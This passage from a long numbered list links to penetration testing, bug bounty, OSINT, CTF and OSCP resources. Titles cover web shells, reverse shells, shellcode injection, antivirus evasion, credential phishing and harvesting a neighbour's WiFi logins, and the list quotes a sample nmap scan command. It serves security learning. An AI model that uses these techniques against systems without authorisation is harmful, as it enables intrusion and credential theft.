Identifying Information from a Phone Number Using OSINT Tools: https://null-byte.wonderhowto.com/how-to/find-identifying-information-from-phone-number-using-osint-tools-0195472/ -1803-Find Details Of any Mobile Number, Email ID, IP Address in the world (Step By Step): https://www.securitynewspaper.com/2019/05/02/find-details-of-any-mobile-number-email-id-ip-address-in-the-world-step-by-step/ -1804-Investigative tools for finding people online and keeping yourself safe: https://ijnet.org/en/story/investigative-tools-finding-people-online-and-keeping-yourself-safe -1805- Full text of "The Hacker Playbook 2 Practical Guide To Penetration Testing By Peter Kim": https://archive.org/stream/TheHackerPlaybook2PracticalGuideToPenetrationTestingByPeterKim/The%20Hacker%20Playbook%202%20-%20Practical%20Guide%20To%20Penetration%20Testing%20By%20Peter%20Kim_djvu.txt -1806-The Internet Archive offers over 15,000,000 freely downloadable books and texts. There is also a collection of 550,000 modern eBooks that may be borrowed by anyone with a free archive.org account: https://archive.org/details/texts?and%5B%5D=hacking&sin= -1807-Exploiting SSRF like a Boss — Escalation of an SSRF to Local File Read!: https://medium.com/@zain.sabahat/exploiting-ssrf-like-a-boss-c090dc63d326 -1808-How to Pass OSCP Like Boss: https://medium.com/@parthdeshani/how-to-pass-oscp-like-boss-b269f2ea99d -1809-Deploy a private Burp Collaborator Server in Azure: https://medium.com/bugbountywriteup/deploy-a-private-burp-collaborator-server-in-azure-f0d932ae1d70 -1810-Using Shodan Better Way! :): https://medium.com/bugbountywriteup/using-shodan-better-way-b40f330e45f6 -1811-How To Do Your Reconnaissance Properly Before Chasing A Bug Bounty: https://medium.com/bugbountywriteup/guide-to-basic-recon-bug-bounties-recon-728c5242a115 -1812-How we got LFI in apache Drill (Recon like a boss):: https://medium.com/bugbountywriteup/how-we-got-lfi-in-apache-drill-recon-like-a-boss-6f739a79d87d -1813-Chaining Self XSS with UI Redressing is Leading to Session Hijacking: https://medium.com/bugbountywriteup/chaining-self-xss-with-ui-redressing-is-leading-to-session-hijacking-pwn-users-like-a-boss-efb46249cd14 -1814-Week in OSINT #2019–19: https://medium.com/week-in-osint/week-in-osint-2019-18-1975fb8ea43a4 -1814-Week in OSINT #2019–02: https://medium.com/week-in-osint/week-in-osint-2019-02-d4009c27e85f -1815-Week in OSINT #2019–24: https://medium.com/week-in-osint/week-in-osint-2019-24-4fcd17ca908f -1816-Page Admin Disclosure | Facebook Bug Bounty 2019: https://medium.com/bugbountywriteup/page-admin-disclosure-facebook-bug-bounty-2019-ee9920e768eb -1817-XSS in Edmodo within 5 Minute (My First Bug Bounty): https://medium.com/@valakeyur/xss-in-edmodo-within-5-minute-my-first-bug-bounty-889e3da6167d -1818-Collection Of Bug Bounty Tip-Will Be updated daily: https://medium.com/@vignesh4303/collection-of-bug-bounty-tip-will-be-updated-daily-605911cfa248 -1819-A Unique XSS Scenario in SmartSheet || $1000 bounty.: https://medium.com/@rohanchavan/a-unique-xss-scenario-1000-bounty-347f8f92fcc6 -1820-How I found a simple bug in Facebook without any Test: https://medium.com/bugbountywriteup/how-i-found-a-simple-bug-in-facebook-without-any-test-3bc8cf5e2ca2 -1821-Facebook BugBounty — Disclosing page members: https://medium.com/@tnirmalz/facebook-bugbounty-disclosing-page-members-1178595cc520 -1822-Don’t underestimates the Errors They can provide good $$$ Bounty!: https://medium.com/@noob.assassin/dont-underestimates-the-errors-they-can-provide-good-bounty-d437ecca6596 -1823-Django and Web Security Headers: https://medium.com/@ksarthak4ever/django-and-web-security-headers-d72a9e54155e -1824-Weaponising Staged Cross-Site Scripting (XSS) Payloads: https://medium.com/redteam/weaponising-staged-cross-site-scripting-xss-payloads-7b917f605800 -1825-How I was able to Bypass XSS Protection on HackerOne’s Private Program: https://medium.com/@vulnerabilitylabs/how-i-was-able-to-bypass-xss-protection-on-hackerones-private-program-8914a31339a9 -1826-XSS in Microsoft subdomain: https://blog.usejournal.com/xss-in-microsoft-subdomain-81c4e46d6631 -1827-How Angular Protects Us From XSS Attacks?: https://medium.com/hackernoon/how-angular-protects-us-from-xss-attacks-3cb7a7d49d95 -1828-[FUN] Bypass XSS Detection WAF: https://medium.com/soulsecteam/fun-bypass-xss-detection-waf-cabd431e030e -1829-Bug Hunting Methodology(Part-2): https://blog.usejournal.com/bug-hunting-methodology-part-2-5579dac06150 -1830-Learn Web Application Penetration Testing: https://blog.usejournal.com/web-application-penetration-testing-9fbf7533b361 -1831-“Exploiting a Single Parameter”: https://medium.com/securitywall/exploiting-a-single-parameter-6f4ba2acf523 -1832-CORS To CSRF Attack: https://blog.usejournal.com/cors-to-csrf-attack-c33a595d441 -1833-Account Takeover Using CSRF(json-based): https://medium.com/@shub66452/account-takeover-using-csrf-json-based-a0e6efd1bffc -1834-Bypassing Anti-CSRF with Burp Suite Session Handling: https://bestestredteam.com/tag/anti-csrf/ -1835-10 Methods to Bypass Cross Site Request Forgery (CSRF): https://haiderm.com/10-methods-to-bypass-cross-site-request-forgery-csrf/ -1836-Exploiting CSRF on JSON endpoints with Flash and redirects: https://medium.com/p/681d4ad6b31b -1837-Finding and exploiting Cross-site request forgery (CSRF): https://securityonline.info/finding-exploiting-cross-site-request-forgery/ -1838-Hacking Facebook accounts using CSRF in Oculus-Facebook integration: https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf -1839-Synchronizer Token Pattern: No more tricks: https://medium.com/p/d2af836ccf71 -1840-The $12,000 Intersection between Clickjacking, XSS, and Denial of Service: https://medium.com/@imashishmathur/the-12-000-intersection-between-clickjacking-xss-and-denial-of-service-f8cdb3c5e6d1 -1841-XML External Entity(XXE): https://medium.com/@ghostlulzhacks/xml-external-entity-xxe-62bcd1555b7b -1842-XXE Attacks— Part 1: XML Basics: https://medium.com/@klose7/https-medium-com-klose7-xxe-attacks-part-1-xml-basics-6fa803da9f26 -1843-From XXE to RCE with PHP/expect — The Missing Link: https://medium.com/@airman604/from-xxe-to-rce-with-php-expect-the-missing-link-a18c265ea4c7 -1844-My first XML External Entity (XXE) attack with .gpx file: https://medium.com/@valeriyshevchenko/my-first-xml-external-entity-xxe-attack-with-gpx-file-5ca78da9ae98 -1845-Open Redirects & Security Done Right!: https://medium.com/@AkshaySharmaUS/open-redirects-security-done-right-e524a3185496 -1846-XXE on Windows system …then what ??: https://medium.com/@canavaroxum/xxe-on-windows-system-then-what-76d571d66745 -1847-Unauthenticated Blind SSRF in Oracle EBS CVE-2018-3167: https://medium.com/@x41x41x41/unauthenticated-ssrf-in-oracle-ebs-765bd789a145 -1848-SVG XLink SSRF fingerprinting libraries version: https://medium.com/@arbazhussain/svg-xlink-ssrf-fingerprinting-libraries-version-450ebecc2f3c -1849-What is XML Injection Attack: https://medium.com/@dahiya.aj12/what-is-xml-injection-attack-279691bd00b6 -1850-SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1: https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978 -1851-Penetration Testing Introduction: Scanning & Reconnaissance: https://medium.com/cyberdefenders/penetration-testing-introduction-scanning-reconnaissance-f865af0761f -1852-Beginner’s Guide to recon automation.: https://medium.com/bugbountywriteup/beginners-guide-to-recon-automation-f95b317c6dbb -1853-Red Teamer’s Guide to Pulse Secure SSL VPN: https://medium.com/bugbountywriteup/pulse-secure-ssl-vpn-post-auth-rce-to-ssh-shell-2b497d35c35b -1854-CVE-2019-15092 WordPress Plugin Import Export Users = 1.3.0 - CSV Injection: https://medium.com/bugbountywriteup/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection-b5cc14535787 -1855-How I harvested Facebook credentials via free wifi?: https://medium.com/bugbountywriteup/how-i-harvested-facebook-credentials-via-free-wifi-5da6bdcae049 -1856-How to hack any Payment Gateway?: https://medium.com/bugbountywriteup/how-to-hack-any-payment-gateway-1ae2f0c6cbe5 -1857-How I hacked into my neighbour’s WiFi and harvested login credentials?: https://medium.com/bugbountywriteup/how-i-hacked-into-my-neighbours-wifi-and-harvested-credentials-487fab106bfc -1858-What do Netcat, SMTP and self XSS have in common? Stored XSS: https://medium.com/bugbountywriteup/what-do-netcat-smtp-and-self-xss-have-in-common-stored-xss-a05648b72002 -1859-1-Click Account Takeover in Virgool.io — a Nice Case Study: https://medium.com/bugbountywriteup/1-click-account-takeover-in-virgool-io-a-nice-case-study-6bfc3cb98ef2 -1860-Digging into Android Applications — Part 1 — Drozer + Burp: https://medium.com/bugbountywriteup/digging-android-applications-part-1-drozer-burp-4fd4730d1cf2 -1861-Linux for Pentester: APT Privilege Escalation: https://www.hackingarticles.in/linux-for-pentester-apt-privilege-escalation -1862-Linux for Pentester : ZIP Privilege Escalation: https://www.hackingarticles.in/linux-for-pentester-zip-privilege-escalation -1863-Koadic - COM Command & Control Framework: https://www.hackingarticles.in/koadic-com-command-control-framework -1864-Configure Sqlmap for WEB-GUI in Kali Linux : https://www.hackingarticles.in/configure-sqlmap-for-web-gui-in-kali-linux -1865-Penetration Testing: https://www.hackingarticles.in/Penetration-Testing -1866-Buffer Overflow Examples, Code execution by shellcode : https://0xrick.github.io/binary-exploitation/bof5 -1867-Dynamic Shellcode Execution: https://www.countercept.com/blog/dynamic-shellcode-execution -1868-JSC Exploits: -https://googleprojectzero.blogspot.com/2019/08/jsc-exploits.html -1869-Injecting Into The Hunt: https://jsecurity101.com/2019/Injecting-Into-The-Hunt -1870-Bypassing Antivirus with Golang: https://labs.jumpsec.com/2019/06/20/bypassing-antivirus-with-golang-gopher.it -1871-Windows Process Injection: Print Spooler: https://modexp.wordpress.com/2019/03/07/process-injection-print-spooler -1872-Inject Shellcode Into Memory Using Unicorn : https://ethicalhackingguru.com/inject-shellcode-memory-using-unicorn -1873-Macros and More with SharpShooter v2.0: https://www.mdsec.co.uk/2019/02/macros-and-more-with-sharpshooter-v2-0 -1874-Fuzz Testing(Fuzzing) Tutorial: What is, Types, Tools & Example: https://www.guru99.com/fuzz-testing -1875-Introduction to File Format Fuzzing & Exploitation: https://medium.com/@DanielC7/introduction-to-file-format-fuzzing-exploitation-922143ab2ab3 -1876-Hacking a social media account and safeguarding it: https://medium.com/@ujasdhami79/hacking-a-social-media-account-and-safeguarding-it-e5f69adf62d7 -1877-OTP Bypass on India’s Biggest Video Sharing Site: https://medium.com/bugbountywriteup/otp-bypass-on-indias-biggest-video-sharing-site-e94587c1aa89 -1879-Getting Root on macOS via 3rd Party Backup Software: https://medium.com/tenable-techblog/getting-root-on-macos-via-3rd-party-backup-software-b804085f0c9 -1880-How to Enumerate MYSQL Database using Metasploit: https://ehacking.net/2020/03/how-to-enumerate-mysql-database-using-metasploit-kali-linux-tutorial.html -1881-Exploiting Insecure Firebase Database! https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty -1882-Penetration Testing - Complete Guide: https://softwaretestinghelp.com/penetration-testing-guide -1883-How To Upload A PHP Web Shell On WordPress Site: https://1337pwn.com/how-to-upload-php-web-shell-on-wordpress-site -1884-Mimikatz tutorial: How it hacks Windows passwords, credentials: https://searchsecurity.techtarget.com/tutorial/Mimikatz-tutorial-How-it-hacks-Windows-passwords-credentials -1885-Ethical hacking: Lateral movement techniques: https://securityboulevard.com/2019/09/ethical-hacking-lateral-movement-techniques -1886-A Pivot Cheatsheet for Pentesters: http://nullsweep.com/pivot-cheatsheet-for-pentesters -1887-What to Look for When Reverse Engineering Android Apps: http://nowsecure.com/blog/2020/02/26/what-to-look-for-when-reverse-engineering-android-apps -1888-Modlishka: Advance Phishing to Bypass 2 Factor Auth: http://crackitdown.com/2019/02/modlishka-kali-linux.html -1889-Bettercap Usage Examples (Overview, Custom setup, Caplets ): www.cyberpunk.rs/bettercap-usage-examples-overview-custom-setup-caplets -1890-The Complete Hashcat Tutorial: https://ethicalhackingguru.com/the-complete-hashcat-tutorial -1891-Wireless Wifi Penetration Testing Hacker Notes: https://executeatwill.com/2020/01/05/Wireless-Wifi-Penetration-Testing-Hacker-Notes -1892-#BugBounty writeups: https://pentester.land/list-of-bug-bounty-writeups.html -1893-Kerberoasting attack: https://en.hackndo.com/kerberoasting -1894-A Pentester's Guide - Part 2 (OSINT - LinkedIn is not just for jobs): https://delta.navisec.io/osint-for-pentesters-part-2-linkedin-is-not-just-for-jobs -1895-Radare2 cutter tutorial: http://cousbox.com/axflw/radare2-cutter-tutorial.html -1896-Cracking Password Hashes with Hashcat: http://hackingvision.com/2020/03/22/cracking-password-hashes-hashcat -1897-From CSRF to RCE and WordPress-site takeover CVE-2020-8417: http://blog.wpsec.com/csrf-to-rce-wordpress -1898-Best OSINT Tools: http://pcwdld.com/osint-tools-and-software -1899-Metasploit Exploitation Tool 2020: http://cybervie.com/blog/metasploit-exploitation-tool -1900-How to exploit CVE-2020-7961: https://synacktiv.com/posts/pentest/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html -1901-PowerShell for Pentesters: https://varonis.com/blog/powershell-for-pentesters -1902-Android Pentest Tutorial: https://packetstormsecurity.com/files/156432/Android-Pentest-Tutorial-Step-By-Step.html -1903-Burp Suite Tutorial: https://pentestgeek.com/web-applications/burp-suite-tutorial-1 -1904-Company Email Enumeration + Breached Email Finder: https://metalkey.github.io/company-email-enumeration--breached-email-finder.html -1905-Kali Linux Cheat Sheet for Penetration Testers: https://github.com/NoorQureshi/kali-linux-cheatsheet -1906-Active Directory Exploitation Cheat Sheet: A cheat sheet that contains common enumeration and attack methods for Windows Active Directory. https://github.com/buftas/Active-Directory-Exploitation-Cheat-Sheet#using-bloodhound -1907-Advanced Hacking Tutorials Collection: https://yeahhub.com/advanced-hacking-tutorials-collection -1908-Persistence – DLL Hijacking: https://pentestlab.blog/2020/03/04/persistence-dll-hijacking -1909-Brute force and dictionary attacks: A cheat sheet: https://techrepublic.com/article/brute-force-and-dictionary-attacks-a-cheat-sheet -1910-How to use Facebook for Open Source Investigation: https://securitynewspaper.com/2020/03/11/how-to-use-facebook-for-open-source-investigation-osint -1911-tcpdump Cheat Sheet: https://comparitech.com/net-admin/tcpdump-cheat-sheet -1912-Windows Post exploitation recon with Metasploit: https://hackercool.com/2016/10/windows-post-exploitation-recon-with-metasploit -1913-Bug Hunting Methodology: https://blog.usejournal.com/bug-hunting-methodology-part-1-91295b2d2066 -1914-Malware traffic analysis tutorial: https://apuntpsicolegs.com/veke0/malware-traffic-analysis-tutorial.html -1915-Recon-ng v5 Tutorial: https://geekwire.eu/recon-ng-v5-tutorial -1916-Windows and Linux Privilege Escalation Tools: https://yeahhub.com/windows-linux-privilege-escalation-tools-2019 -1917-Total OSCP Guide: https://sushant747.gitbooks.io/total-oscp-guide -1918-Phishing Windows Credentials: https://pentestlab.blog/2020/03/02/phishing-windows-credentials -1919-Getting What You're Entitled To: A Journey Into MacOS Stored Credentials: https://mdsec.co.uk/2020/02/getting-what-youre-entitled-to-a-journey-in-to-macos-stored-credentials -1920-Recent Papers Related To Fuzzing: https://wcventure.github.io/FuzzingPaper -1921-Web Shells 101 Using PHP (Web Shells Part 2): https://acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/ -1922-Python3 reverse shell: https://polisediltrading.it/hai6jzbs/python3-reverse-shell.html -1923-Reverse Shell between two Linux machines: https://yeahhub.com/reverse-shell-linux-machines -1924-Tutorial - Writing Hardcoded Windows Shellcodes (32bit): https://dsolstad.com/shellcode/2020/02/02/Tutorial-Hardcoded-Writing-Hardcoded-Windows-Shellcodes-32bit.html -1925-How to Use Wireshark: Comprehensive Tutorial + Tips: https://varonis.com/blog/how-to-use-wireshark -1926-How To Use PowerShell for Privilege Escalation with Local Privilege Escalation? https://varonis.com/blog/how-to-use-powershell-for-privilege-escalation-with-local-computer-accounts -1927-Ethical hacking:Top privilege escalation techniques in Windows: https://securityboulevard.com/2020/03/ethical-hacking-top-privilege-escalation-techniques-in-windows -1928-How to Identify Company's Hacked Email Addresses: https://ehacking.net/2020/04/how-to-identify-companys-hacked-email-addresses-using-maltego-osint-haveibeenpawned.html -1929-Android APK Reverse Engineering: What's in an APK: https://secplicity.org/2019/09/11/android-apk-reverse-engineering-whats-in-an-apk -1930-Keep Calm and HackTheBox - Beep: https://freecodecamp.org/news/keep-calm-and-hack-the-box-beep/ -1931-Keep Calm and HackTheBox -Legacy: https://freecodecamp.org/news/keep-calm-and-hack-the-box-legacy/ -1932-Keep Calm and HackTheBox -Lame: https://freecodecamp.org/news/keep-calm-and-hack-the-box-lame/ -1933-HacktheBox:Writeup Walkthrough: https://hackingarticles.in/hack-the-box-writeup-walkthrough -1934-2020 OSCP Exam Preparation: https://cybersecurity.att.com/blogs/security-essentials/how-to-prepare-to-take-the-oscp -1935-My OSCP transformation: https://kevsec.fr/journey-to-oscp-2019-write-up -1936-A Detailed Guide on OSCP Preparation: https://niiconsulting.com/checkmate/2017/06/a-detail-guide-on-oscp-preparation-from-newbie-to-oscp/ -1937-Useful Commands and Tools - #OSCP: https://yeahhub.com/useful-commands-tools-oscp/ -1938-Comprehensive Guide on Password Spraying Attack https://hackingarticles.in/comprehensive-guide-on-password-spraying-attack -1939-Privilege Escalation: https://pentestlab.blog/category/privilege-escalation/ -1940-Red Team: https://pentestlab.blog/category/red-team/ -1941-Linux post-exploitation.Advancing from user to super-user in a few clicks https://hackmag.com/security/linux-killchain/ -1942--#BugBounty Cheatsheet https://m0chan.github.io/2019/12/17/Bug-Bounty-Cheetsheet.html -1943--#Windows Notes/Cheatsheet https://m0chan.github.io/2019/07/30/Windows-Notes-and-Cheatsheet.html -1944-#Linux Notes/Cheatsheet https://m0chan.github.io/2018/07/31/Linux-Notes-And-Cheatsheet.html -1945-Windows Notes https://mad-coding.cn/tags/Windows/ -1946-#BlueTeam CheatSheet https://gist.github.com/SwitHak/62fa7f8df378cae3a459670e3a18742d -1947-Linux Privilege Escalation Cheatsheet for OSCP: https://hackingdream.net/2020/03/linux-privilege-escalation-cheatsheet-for-oscp.html -1948-Shodan Pentesting Guide: https://community.turgensec.com/shodan-pentesting-guide -1949-Pentesters Guide to PostgreSQL Hacking: https://medium.com/@netscylla/pentesters-guide-to-postgresql-hacking-59895f4f007 -1950-Hacking-OSCP cheatsheet: https://ceso.github.io/posts/2020/04/hacking/oscp-cheatsheet/ -1951-A Comprehensive Guide to Breaking SSH: https://community.turgensec.com/ssh-hacking-guide -1952-Windows Privilege Escalation Methods for Pentesters: https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ -1953-Best #firefox addons for #Hacking: https://twitter.com/cry__pto/status/1210836734331752449 -1954-S3 Bucket Enumeration Tools: https://twitter.com/cry__pto/status/1269862357645307904 -1955-Github Recon Tools: https://twitter.com/cry__pto/status/1269362041044832257 -1956-i created this group for more in depth sharing about hacking and penetration testing /daily posts: you can join: https://facebook.com/groups/AmmarAmerHacker -1957-Directory Bruteforcing Tools: && SCREENSHOTTING Tools: https://twitter.com/cry__pto/status/1270603017256124416 -1958-S3 Bucket Enumeration Tools: https://twitter.com/cry__pto/status/1269862357645307904 -1959-Github Recon Tools: https://twitter.com/cry__pto/status/1269362041044832257 -1960-Website Mirroring Tools: https://twitter.com/cry__pto/status/1248640849812078593 -1961-automated credential discovery tools: https://twitter.com/cry__pto/status/1253214720372465665 -1962-Antiforensics Techniques: https://twitter.com/cry__pto/status/1215001674760294400 -1963-#bugbounty tools part (1): https://twitter.com/cry__pto/status/1212096231301881857 1964-Binary Analysis Frameworks: https://twitter.com/cry__pto/status/1207966421575184384 -1965-#BugBounty tools part (5): https://twitter.com/cry__pto/status/1214850754055458819 -1966-#BugBounty tools part (3): https://twitter.com/cry__pto/status/1212290510922158080 -1967-Kali Linux Commands List (Cheat Sheet): https://twitter.com/cry__pto/status/1264530546933272576 -1968-#BugBounty tools part (4): https://twitter.com/cry__pto/status/1212296173412851712 -1969--Automated enumeration tools: https://twitter.com/cry__pto/status/1214919232389099521 -1970-DNS lookup information Tools: https://twitter.com/cry__pto/status/1248639962746105863 -1971-OSCP: https://twitter.com/cry__pto/status/1262089078339756032 -1972-Social Engineering Tools: https://twitter.com/cry__pto/status/1180731438796333056 -1973-Hydra : https://twitter.com/cry__pto/status/1247507926807449600 -1974-#OSINT Your Full Guide: https://twitter.com/cry__pto/status/1244433669936349184 -1975-#BugBounty tools part (2): https://twitter.com/cry__pto/status/1212289852059860992 -1976-my own ebook library: https://twitter.com/cry__pto/status/1239308541468516354 -1977-Practice part (2): https://twitter.com/cry__pto/status/1213165695556567040 -1978-Practice part (3): https://twitter.com/cry__pto/status/1214220715337097222 -1979-my blog: https://twitter.com/cry__pto/status/1263457516672954368 -1980-Practice: https://twitter.com/cry__pto/status/1212341774569504769 -1981-how to search for XSS without proxy tool: https://twitter.com/cry__pto/status/1252558806837604352 -1982-How to collect email addresses from search engines: https://twitter.com/cry__pto/status/1058864931792138240 -1983-Hacking Tools Cheat Sheet: https://twitter.com/cry__pto/status/1255159507891687426 -1984-#OSCP Your Full Guide: https://twitter.com/cry__pto/status/1240842587927445504 -1985-#HackTheBox Your Full Guide: https://twitter.com/cry__pto/status/1241481478539816961 -1986-Web Scanners: https://twitter.com/cry__pto/status/1271826773009928194 -1987-HACKING MAGAZINES: -1-2600 — The Hacker Quarterly magazine:www.2600.com -2-Hackin9:http://hakin9.org -3-(IN)SECURE magazine:https://lnkd.in/grNM2t8 -4-PHRACK:www.phrack.org/archives -5-Hacker’s Manual 2019 -1988-Web Exploitation Tools: https://twitter.com/cry__pto/status/1272778056952885249 -1989-Kali Linux Cheat Sheet for Hackers: https://twitter.com/cry__pto/status/1272792311236263937 -1990-Web Exploitation Tools: https://twitter.com/cry__pto/status/1272778056952885249 -1991-2020 OSCP Exam Preparation + My OSCP transformation +A Detailed Guide on OSCP Preparation + Useful Commands and Tools - #OSCP: https://twitter.com/cry__pto/status/1262089078339756032 -1992-100 Best Hacking Tools for Security Professionals in 2020: https://gbhackers.com/hacking-tools-list/ -1993-SNMP Enumeration: OpUtils:www.manageengine.com SNMP Informant:www.snmp-informant.com SNMP Scanner:www.secure-bytes.com SNMPUtil:www.wtcs.org SolarWinds:www.solarwinds.com -1994-INFO-SEC RELATED CHEAT SHEETS: https://twitter.com/cry__pto/status/1274768435361337346 -1995-METASPLOIT CHEAT SHEET: https://twitter.com/cry__pto/status/1274769179548278786 -1996-Nmap Cheat Sheet, plus bonus Nmap + Nessus: https://twitter.com/cry__pto/status/1275359087304286210 -1997-Wireshark Cheat Sheet - Commands, Captures, Filters, Shortcuts & More: https://twitter.com/cry__pto/status/1276391703906222080 -1998-learn penetration testing a great series as PDF: https://twitter.com/cry__pto/status/1277588369426526209 -1999-Detecting secrets in code committed to Gitlab (in real time): https://www.youtube.com/watch?v=eCDgUvXZ_YE -2000-Penetration Tester’s Guide to Evaluating OAuth 2.0 — Authorization Code Grants: https://maxfieldchen.com/posts/2020-05-17-penetration-testers-guide-oauth-2.html -2001-Building Virtual Machine Labs: https://github.com/da667/Building_Virtual_Machine_Labs-Live_Training -2002-Windows Kernel Exploit Cheat Sheet for [HackTheBox]: https://kakyouim.hatenablog.com/entry/2020/05/27/010807 -2003-19 Powerful Penetration Testing Tools In 2020 (Security Testing Tools): https://softwaretestinghelp.com/penetration-testing-tools/ -2004-Full Connect Scan (-sT): -complete the three-way handshake -slower than SYN scan -no need for superuser Privileges -when stealth is not required -to know for sure which port is open -when running port scan via proxies like TOR -it can be detected nmap -sT -p 80 192.168.1.110 -2005-today i learned that you can use strings command to extract email addresses from binary files: strings -n 8 /usr/bin/who | grep '@' -2005-pentest cheat sheet : https://gist.github.com/githubfoam/4d3c99383b5372ee019c8fbc7581637d -2006-Tcpdump cheat sheet : https://gist.github.com/jforge/27962c52223ea9b8003b22b8189d93fb -2007-tcpdump - reading tcp flags : https://gist.github.com/tuxfight3r/9ac030cb0d707bb446c7 -2008-CTF-Notes - Hackers Resources Galore: https://github.com/TheSecEng/CTF-notes -2009-Pentest-Cheat-Sheets: https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets -2010--2-Web Application Cheatsheet (Vulnhub): https://github.com/Ignitetechnologies/Web-Application-Cheatsheet -2011-A cheatsheet with commands that can be used to perform kerberos attacks : https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a -2012-Master Shodan Search Engine: https://rootkitpen.blogspot.com/2020/08/master-shodan-search-engine.html -2013-CTF Cheatsheet: https://github.com/uppusaikiran/awesome-ctf-cheatsheet -2014-Pentesting Cheatsheet: https://gist.github.com/jeremypruitt/c435aefa2c2abaec02985d77fb370ec5 -2015-Hacking Cheatsheet: https://github.com/kobs0N/Hacking-Cheatsheet -2016-Hashcat-Cheatsheet: https://github.com/frizb/Hashcat-Cheatsheet -2017-Wireshark Cheat Sheet: https://github.com/security-cheatsheet/wireshark-cheatsheet -2018-JustTryHarder: https://github.com/sinfulz/JustTryHarder -2019-PWK-CheatSheet: https://github.com/ibr2/pwk-cheatsheet -2020-kali linux cheatsheet: https://github.com/NoorQureshi/kali-linux-cheatsheet -2021-Hydra-Cheatsheet: https://github.com/frizb/Hydra-Cheatsheet -2022-Security Tools Cheatsheets: https://github.com/jayeshjodhawat -2023-popping-shells-instead-of-alert-boxes-weaponizing-xss-for-fun-and-profit: https://www.trustedsec.com/events/webinar-popping-shells-instead-of-alert-boxes-weaponizing-xss-for-fun-and-profit/ -2024-TRICKS FOR WEAPONIZING XSS: https://www.trustedsec.com/blog/tricks-for-weaponizing-xss/ -2025-OSCP Notes: https://github.com/tbowman01/OSCP-PWK-Notes-Public -2026-OSCP Notes: https://github.com/Technowlogy-Pushpender/oscp-notes -2027-list of useful commands, shells and notes related to OSCP: https://github.com/s0wr0b1ndef/OSCP-note -2028-Notes for taking the OSCP in 2097: https://github.com/dostoevskylabs/dostoevsky-pentest-notes -2029-My OSCP notes: https://github.com/tagnullde/OSCP -2030-Discover Blind Vulnerabilities with DNSObserver: an Out-of-Band DNS Monitor https://www.allysonomalley.com/2020/05/22/dnsobserver/ -2031-Red Team Notes: https://dmcxblue.gitbook.io/red-team-notes/ -2032-Evading Detection with Excel 4.0 Macros and the BIFF8 XLS Format: https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls -2033-ESCALATING SUBDOMAIN TAKEOVERS TO STEAL COOKIES BY ABUSING DOCUMENT.DOMAIN: https://blog.takemyhand.xyz/2019/05/escalating-subdomain-takeovers-to-steal.html -2034-[SSTI] BREAKING GO'S TEMPLATE ENGINE TO GET XSS: https://blog.takemyhand.xyz/2020/05/ssti-breaking-gos-template-engine-to.html -2035-Metasploitable 3: https://kakyouim.hatenablog.com/entry/2020/02/16/213616 -2036-Reverse engineering and modifying an Android game: https://medium.com/swlh/reverse-engineering-and-modifying-an-android-game-apk-ctf-c617151b874c -2037-Reverse Engineering The Medium App (and making all stories in it free): https://medium.com/hackernoon/dont-publish-yet-reverse-engineering-the-medium-app-and-making-all-stories-in-it-free-48c8f2695687 -2038-Android Apk Reverse Engineering: https://medium.com/@chris.yn.chen/apk-reverse-engineering-df7ed8cec191 -2039-DIY Web App Pentesting Guide: https://medium.com/@luke_83192/diy-web-app-pentesting-guide-be54b303c6eb -2040-Local Admin Access and Group Policy Don’t Mix: https://www.trustedsec.com/blog/local-admin-access-and-group-policy-dont-mix/ -2041-BREAKING TYPICAL WINDOWS HARDENING IMPLEMENTATIONS: https://www.trustedsec.com/blog/breaking-typical-windows-hardening-implementations/ -2042-Decrypting ADSync passwords - my journey into DPAPI: https://o365blog.com/post/adsync/ -2043-Ultimate Guide: PostgreSQL Pentesting: https://medium.com/@lordhorcrux_/ultimate-guide-postgresql-pentesting-989055d5551e -2044-SMB Enumeration for Penetration Testing: https://medium.com/@arnavtripathy98/smb-enumeration-for-penetration-testing-e782a328bf1b -2045-(Almost) All The Ways to File Transfer: https://medium.com/@PenTest_duck/almost-all-the-ways-to-file-transfer-1bd6bf710d65 -2046-HackTheBox TartarSauce Writeup: https://kakyouim.hatenablog.com/entry/2020/05/14/230445 -2047-Kerberos-Attacks-In-Depth: https://m0chan.github.io/Kerberos-Attacks-In-Depth -2048-From Recon to Bypassing MFA Implementation in OWA by Using EWS Misconfiguration: https://medium.com/bugbountywriteup/from-recon-to-bypassing-mfa-implementation-in-owa-by-using-ews-misconfiguration-b6a3518b0a63 -2049-Writeups for infosec Capture the Flag events by team Galaxians: https://github.com/shiltemann/CTF-writeups-public -2050-Angstrom CTF 2018 — web challenges [writeup]: https://medium.com/bugbountywriteup/angstrom-ctf-2018-web-challenges-writeup-8a69998b0123 -2051-How to get started in CTF | Complete Begineer Guide: https://medium.com/bugbountywriteup/how-to-get-started-in-ctf-complete-begineer-guide-15ab5a6856d -2052-Hacking 101: An Ethical Hackers Guide for Getting from Beginner to Professional: https://medium.com/@gavinloughridge/hacking-101-an-ethical-hackers-guide-for-getting-from-beginner-to-professional-cd1fac182ff1 -2053-Reconnaissance the key to Ethical Hacking!: https://medium.com/techloop/reconnaissance-the-key-to-ethical-hacking-3b853510d977 -2054-Day 18: Essential CTF Tools: https://medium.com/@int0x33/day-18-essential-ctf-tools-1f9af1552214 -2055-OSCP Cheatsheet: https://medium.com/oscp-cheatsheet/oscp-cheatsheet-6c80b9fa8d7e -2056-OSCP Cheat Sheet: https://medium.com/@cymtrick/oscp-cheat-sheet-5b8aeae085ad -2057-TryHackMe: vulnversity: https://medium.com/@ratiros01/tryhackme-vulnversity-42074b8644df -2058-Malware Analysis Tools And Resources: https://medium.com/@NasreddineBencherchali/malware-analysis-tools-and-resources-16eb17666886 -2059-Extracting Embedded Payloads From Malware: https://medium.com/@ryancor/extracting-embedded-payloads-from-malware-aaca8e9aa1a9 -2060-Attacks and Techniques Used Against WordPress Sites: https://www.trendmicro.com/en_us/research/19/l/looking-into-attacks-and-techniques-used-against-wordpress-sites.html -2061-Still Scanning IP Addresses? You’re Doing it Wrong: 